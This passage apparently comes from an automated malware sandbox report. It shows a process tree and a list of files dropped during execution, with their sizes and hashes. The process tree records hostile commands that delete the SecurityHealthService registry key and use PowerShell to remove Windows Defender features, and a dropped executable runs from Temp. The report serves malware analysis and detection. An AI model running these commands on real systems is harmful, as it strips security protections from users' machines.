                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2060
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1624
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Get-WindowsFeature -Name Windows-Defender | Remove-WindowsFeature -Remove"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:1932
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Get-WindowsFeature -Name Windows-Defender-GUI | Remove-WindowsFeature -Remove"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:3628
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:2332
                                                                                                                                                                                            • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\DllHost.exe /Processid:{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:376
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:5760

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                            Downloads

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\h2uasj3u.yo3.exe.log

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              660B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              1c5e1d0ff3381486370760b0f2eb656b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              f9df6be8804ef611063f1ff277e323b1215372de

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f424c891fbc7385e9826beed2dd8755aeac5495744b5de0a1e370891a7beaf7a

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              78f5fc40a185d04c9e4a02a3d1b10b4bd684c579a45a0d1e8f49f8dee9018ed7bc8875cbf21f98632f93ead667214a41904226ce54817b85caeeb4b0de54a743

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              53KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              3337d66209faa998d52d781d0ff2d804

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6594b85a70f998f79f43cdf1ca56137997534156

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              e4de99c1795fd54aa87da05fa39c199c

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              107102102e02e48f37f5318c7e113c43

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              7fb10fc65c85fb4c050309f0872bc9389dcccc0d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              f69437dfc5b7cb5d7422d4557c5193a1

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              2ad54bbf836fa97a9386a6b251c5d769a6d2badb

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f91341354f99f965d4737a54743ca914531391e5c03005020ace74f8c536c0e0

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              993fe382cbd8b978e06e6e5870757959b6944d70a4e6bf97420039b20dd6f1a566545cc271b28bcb5795205d4e8ea6ce1ef4effe6ccd45d909c2560e867ccc3c

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              77fad1dec6867fb7dd395c25c46d8ae5

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              abfecfd6c63bb35ec88d98ef210adefc139d793e

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              02b0ab469998ac630b421de245ee243599422e7f2c2f9714085fc5b837891784

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ac8d9d660992d076e46ffdb7422d4916789a7ca2f5737c711449f518745dee197ed1c08e50f81f92cb7d2d1ea94fe024e77a8295e1be05c5a49a0fd7495776d3

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              eeb6ad386d143f278077171fc01a81e8

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              43cff1bd7240965bfb2f10e47c0cec0f94332e2d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              59d62f9472b4c00b7cae0ee702789fa2b0042c468e4de9421d2430f9973eb00d

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              b40f003e6d97adaaf05809f06d12df01984943d9eb6c44eaeffef90df8de0040373150c9714b11a42db5189b7064eeed0609a39f6f1feb91b05dd1835333e8f2

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6e74d159bd6cd2797a1cea6214964451

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              aa0fd9b076298c9e5747f72c71364159c0cadcce

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              b2b1bffeb8beffda654b46e5e6d76acf45ca93ba5b4b26fbca6649a96ed7d1ea

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ccbf6e7ff00369122d444bf8ec314291efa8dc774c1e31a5a50b3db427bf70ae20455659c7b381f264f8ef4fc81bae95bdd45e9b72190028d9b61aa332194ddf

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              23272afe282560b0a5abad03e415e79b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              d24997643237343f0db0d9ab70e445450c70c795

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              b3e29a57ee8c2da3dd7df14e6fd34632246e41950f3efd9ce9d35f1797ece1c9

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              bc013bbd6083ef858570cdcdc89f761177f298cc394a0acfc553b2decc61e056459a539037ed67af13c2c4851e20d8df92a1c23d3d0b818a2e585506f28053c4

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              948B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c8f6df6d92bf2cac2934a7feccad4c2d

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              133881d7f80aa9363b04a15417d0c99a020ec81f

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              96b05a755f649b7da3f71cc7998c4f9f62e090f9fac786c9b3c181514b95bd61

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              6d04a1be03043ab8aa88d5d4d2b62e9a534187c4962a62b32cefb9099c11ba4f39194da39eaf28ac89932b0cf360f94d8da1981d8c12392ab389ada7cec3ec99

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              944B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              45ba6278bda0d4d1c5ced41979c15e9c

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              b0f13d0422550d74b0dda1fd06662fe9229f5bcb

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              220aad7c4486d0f55d381f10902d72083199740406f02dab34641187f8094053

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              3a55755de1f3f5aa387c348de5c67a9a234e29e47de6940f9c9d11f34b77f78ddcde01e8e029dd4e5b4ed903f1ae6335f557c5c688fac834606ddb667c7fa2e1

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              5cb7e1e6ae37558dcd7844cf51866b17

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              3bf74e29cb16441e7e4417771e1b55e6606de93e

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5915aad427548af22f97e2f44498625c47af1be9b763b16cf3c682d9c19eeb9a

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              4afa06cf68be8f505a6b1392a767f3c9bd041b89d4221075a680f38e56d9fcfe2febe693b93b1ed8ce4ec16bb29f8608edfc244d650ee3bc60ca1bef20805513

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              944B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6d42b6da621e8df5674e26b799c8e2aa

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              944B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              07ab6cc81c5230a598c0ad1711b6bd97

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              de7e270e12d447dfc5896b7c96777eb32725778a

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              900aa2c83ec8773c3f9705f75b28fff0eaca57f7adb33dc82564d7ea8f8069a3

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ffef0ad0824ea0fdab29eb3c44448100f79365a1729c7665eba9aef85a88e60901bc6a6c248de15a28d21be9ce5839d68861e4449ff557d8845927c740ba3a25

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              17f4d5ecc1e1842edb8c17a16fd53f94

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              7efa50bc8d794a8fb001adadf00bd39791142d22

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              add39b4f1b10813294ee6bfb45143828c29d7188049c39000cd498d57f151729

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              8c044cac1acbce647e84dd1ca31b1672ed5611208316d85f7c9544f1cc8b7c05fb7b989ab3286559b28bd61cd5a17ba1f4a07f5e9c0b2c25726f149ef88437d3

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              2238871af228384f4b8cdc65117ba9f1

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              2a200725f1f32e5a12546aa7fd7a8c5906757bd1

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              190cc2feb6fbf6a6143f296ebe043de5

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              8fa72a99c46ed77b602476c85ca2d8ea251b22fb

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              5ac9b79fe5b0fa475e8e26ca7fc5347f

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              de7a757f0c1d7af0a665578c06c4f736e7fe03f6

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              ee01721fea058d657c095746b14c762cecdc6a21158a3d59022ad1ef27b323a7

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              7954f316c84470536fe20e6a13b7897b3735c738a1dcd6315bcf8c8f48dcb5596188bb2df8dc6b97d52581da07163aaa66976ca9b2870b1698ac078ccf57d30c

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              554a87379c5ea28c3bc82042d06d9837

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a6f88de35deca05ceb02f07dda3e6f71f4bb2e1d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              4fe56468a7375fa12d5a33595ca2132c514996f2783a10121d9de87da0d639c4

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              9c861007c0201d0b1c584a5cdc8b952f5ebce636466cb05f865f615c0e868f3b77a4c7b122b36fb8d0e1322147c7198c442bf87d595c3ba4af6c86b297cc54b6

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6317adf4fbc43ea2fd68861fafd57155

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6b87c718893c83c6eed2767e8d9cbc6443e31913

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              944B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              77d622bb1a5b250869a3238b9bc1402b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              9d01bc05073d026b676edd8e5064ac72

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              221579d22e2389cb27cfc880064b7a5b1734e347

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6b554498594ece7dc91b5e95cba6d2b79f764ec0f261b5d23bfd1eebcf1f4459

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              dfb8ffa48ae4c3c123eb17fefb47cdacd6f0798958587b37a8b547340a087bf7d39bf95cf0f241e0c0871c62c916623ec411187c65a9b32ceb1b0c589e6b1fbc

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              7eb3d47d01bce5faa0a9e0a181390865

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              2ba8cd1ba2cd51d7d96e59078ae6d09af1dd81c4

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6edbd13d52f5b9f73700e76b0fc1f8ecdd2ff3daed77add90e87ec83162b33e9

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              91c1d58ae55a48fd4fc20a82fd6f733f565fd9a6f457356471e940543c8114ffe160aa661b5d3e0d3e9daad342cf64da3e24dcf96ab30ebedc10bc2deb5c1e4f

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              379e6a5569c613c13007cd07ca964760

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              9cc921aadefe9b76f8fc4823a40f9323852bb930

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              7b1c670463978cca8583ae3a88ffb71e99a38867da64906a96a1b134a8ace57f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c90c0a206cd4ad8bcd592c98d62cdc503ce18301ae07271c9ac02d0f2c1d12d70d815ea94a85e1d7549e4a437ee1eb46e4c2514465389e90e3cb3070f2064e6f

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              5a3360e2602e08e5bc375d2fefa1d69b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              9fcbf7877275ba3b4a80dcdbd39fb1882976182c

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              2fb053f6eba78c0af0b4a3d68fabfd27b7e21febc1770bae56dfb36a505d482d

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              09a7dc8ba11647fe0fc4315408720dd3e5524a97f2000ca4f826c2eca91a2d3bc3e1a5ded3ceb1290c87b82313e5a456e6809f40e9d796f0df5cd2b1fb96ddf5

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c1cca1eaf3605a34e79d047e2a85c328

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              58dcc0e5d357f4b1aca1836a368e473aeba45cab

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              bb5ecff4f61a42f032434828cfde49f13a0c5a01a911012b84a23c90c3d70175

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5ec798679a025d23499c5820536eeeb6caeceba8cc2bfafdaad5d38baa68069866b656039ea823f8256a5b1931fbc54426931e00ca943e09561195c412d4850b

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              38626e78f952256a721176512a7f8c26

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              70636067d2b0ec031d6912faba82a8665fa54a08

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              ce79b9265cd36fec49cda6c92664354a8b6448bcf28bc13ff8b318b3b80c756d

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              49005e71061285d59144a8551bb9b317694a64b383c64ec6e3c34308371a95b8fbac7356c2a8eb15477030f9aee10b347bca4f95601ba4b262eb3df0ec22c0d2

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6c14b13b09ca3250b8c108b05aa1afb0

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              18e50e6f1f445add8dbfd7441dba50b4d36f42f0

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              a147f4fb3ba4dee9197d7192ce22385e2c5da6987ab044bd2d2d2b7adac71c4a

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              feca9dd078055a76d09290c2e6ff9dae608bdff807fe7e742ea4961a4877f2b5eb3d9d171941dfd0f19cebd1cebed7d35b3d6cbbecfe7ddfda5daf2bb4f85f69

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b24da7b14ff1d54a476937b579970302

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a0615a005e6357d238efd53d8af1ccbcf052a97f

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              c57b8a15abfab5be0dc1b4fe950b32d380ad0ba2055cbd481ed8b167ed91d0c0

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              2397750147bcf03968376f99332834fff98d8ec3f9e62a6f8d4b21426a8373c3d56c524f6f46e113769ac1f630953bfba636701b55728aa8f4953a133036e6eb

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0uqhlpmx.pkq.bat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              235KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              09b58d9bb561ae71c32f4a03cf424786

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              ea85c1b94e6d2a86a95329db250ff52e410ccca4

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              11cb46c7ab42e64b246f132f193b7062046d969143b4f630edaba7d0d559f813

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              26a4e4656d8fd370c6e5048ff3923e8cb478ebe2360c01248e737dc86c6d3b5f69ccdc4965f8b2c82e78a5c73f7d095f2a23eac262116b6f159c5ba33bda16c0

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2udnvwv0.pib.ps1

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              60B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\aria-debug-2584.log

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              470B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              edb804605edf5c701de91b89f5473297

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              cdcebe2966f717169c9e2d23bc7b859683c0a9e6

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              efb930c05bfb43e22ba22b2a46d793e8a5b2443bd82337c77703a3ac5727e6a3

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              1787f95db7153db73061a8a953807da957af3e0a07947a22a33091d995e06240aa00bd9cb66fc2a63f8a72ef52d63e704a1cae914559cd6a66ec6660194160ed

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\aria-debug-5076.log

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              470B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8f816ce2f743f15d030f5b921407bb51

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              f7db509162cfe490dc5ee3ea1fd2a2a34ccf85a6

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              295c9c54d14a1b5a22ccc22f072e7b2f1310cac7fcd671066ec224c9740d6091

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              edfdb20285ec945b0fa615623ffeabaddbacd8a27e33dea9ddc1bac7d75f3567aaf2f8f079117c91e2c8a7931d1c0c42024a5ecbfe8a98714ef664af7f9b3b80

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              760KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b4b2df0c17b9cc137372cfb2165d613b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              11f44e224ac71e5de4f70ed47ec0653cab0ce0f1

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              6a31601940c0a941ad7bc1b56231e9025477d9137e0d683e9085c890ef59d4085262ee4de2664695c3a2209ff4420c64734e38ce24af9722b5f538d2b2bb7798

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmp9D0C.tmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              dfd4f60adc85fc874327517efed62ff7

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              f97489afb75bfd5ee52892f37383fbc85aa14a69

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

